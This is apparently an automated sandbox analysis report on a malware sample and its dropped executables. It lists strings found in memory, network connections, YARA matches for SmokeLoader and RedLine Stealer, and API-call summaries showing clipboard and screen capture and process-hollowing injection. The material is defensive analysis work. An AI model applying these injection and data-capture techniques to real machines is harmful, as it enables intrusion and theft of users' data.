                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: JKEGDH.9.drString found in binary or memory: https://www.mozilla.org
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                Source: JKEGDH.9.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/IDGDGCGHCG
                Source: JKEGDH.9.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                Source: F441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2699353969.000000001BDA3000.00000004.00000020.00020000.00000000.sdmp, JKEGDH.9.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                Source: JKEGDH.9.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                Source: F441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2699353969.000000001BDA3000.00000004.00000020.00020000.00000000.sdmp, JKEGDH.9.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 52653 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52679
                Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52674
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52671
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52677
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52675
                Source: unknownNetwork traffic detected: HTTP traffic on port 52662 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52689 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52680
                Source: unknownNetwork traffic detected: HTTP traffic on port 52685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52681
                Source: unknownNetwork traffic detected: HTTP traffic on port 52692 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52679 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52684
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52685
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52682
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52683
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52688
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52689
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52686
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52687
                Source: unknownNetwork traffic detected: HTTP traffic on port 52661 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52691
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52692
                Source: unknownNetwork traffic detected: HTTP traffic on port 52665 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52686 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52659 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52690
                Source: unknownNetwork traffic detected: HTTP traffic on port 52669 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52659
                Source: unknownNetwork traffic detected: HTTP traffic on port 52680 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52653
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52664 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52687 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52668 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52690 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52668
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52669
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 52677 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52681 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52662
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52663
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52660
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52661
                Source: unknownNetwork traffic detected: HTTP traffic on port 52660 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52664
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52665
                Source: unknownNetwork traffic detected: HTTP traffic on port 52688 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52663 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52684 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52691 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52653 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52659 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:52660 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52661 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:52662 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_0042EAB0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_0042EAB0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,6_2_0042EC90
                Source: Yara matchFile source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401615
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401658
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401620
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401524
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040162D
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401635
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401615
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401658
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401620
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401524
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040162D
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401635
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeCode function: 8_2_04299B10 NtProtectVirtualMemory,NtProtectVirtualMemory,8_2_04299B10
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeCode function: 8_2_0429A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,8_2_0429A4F0
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeCode function: 8_2_04299850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,8_2_04299850
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0C62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,9_2_6D0C62C0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004273536_2_00427353
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004016E06_2_004016E0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004208806_2_00420880
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004049706_2_00404970
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0041FD106_2_0041FD10
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0043B0506_2_0043B050
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004261746_2_00426174
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004061F06_2_004061F0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004262846_2_00426284
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004223B86_2_004223B8
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004054406_2_00405440
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0040F4006_2_0040F400
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004164D26_2_004164D2
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004334806_2_00433480
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004035706_2_00403570
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004215806_2_00421580
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004067B06_2_004067B0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_004089A06_2_004089A0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00424B806_2_00424B80
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00421C716_2_00421C71
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00425CEE6_2_00425CEE
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00440D366_2_00440D36
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0043AD306_2_0043AD30
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00407DF06_2_00407DF0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00404EF06_2_00404EF0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00435EB06_2_00435EB0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00403F806_2_00403F80
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F12676_2_020F1267
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0212B2B76_2_0212B2B7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_021163DB6_2_021163DB
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F80576_2_020F8057
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_021120676_2_02112067
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_021261176_2_02126117
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F51576_2_020F5157
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F41E76_2_020F41E7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020FF6676_2_020FF667
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F56A76_2_020F56A7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_021236E76_2_021236E7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_021067396_2_02106739
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F37D76_2_020F37D7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F64576_2_020F6457
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_021164EB6_2_021164EB
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_021175BA6_2_021175BA
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_02110AE76_2_02110AE7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F4BD76_2_020F4BD7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_02115F556_2_02115F55
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0212AF976_2_0212AF97
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_020F8C076_2_020F8C07
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeCode function: 8_2_0429AB108_2_0429AB10
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF9ECD09_2_6CF9ECD0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0C8D209_2_6D0C8D20
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF3ECC09_2_6CF3ECC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D06AD509_2_6D06AD50
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D00ED709_2_6D00ED70
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF4AC609_2_6CF4AC60
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0CCDC09_2_6D0CCDC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D006C009_2_6D006C00
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01AC309_2_6D01AC30
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF44DB09_2_6CF44DB0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD6D909_2_6CFD6D90
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D080F209_2_6D080F20
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF4AEC09_2_6CF4AEC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFE0EC09_2_6CFE0EC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFC6E909_2_6CFC6E90
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D002F709_2_6D002F70
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFDEE709_2_6CFDEE70
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D088FB09_2_6D088FB0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01EFF09_2_6D01EFF0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF40FE09_2_6CF40FE0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D020E209_2_6D020E20
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF4EFB09_2_6CF4EFB0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFAEF409_2_6CFAEF40
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF46F109_2_6CF46F10
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0009B09_2_6D0009B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF908209_2_6CF90820
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFCA8209_2_6CFCA820
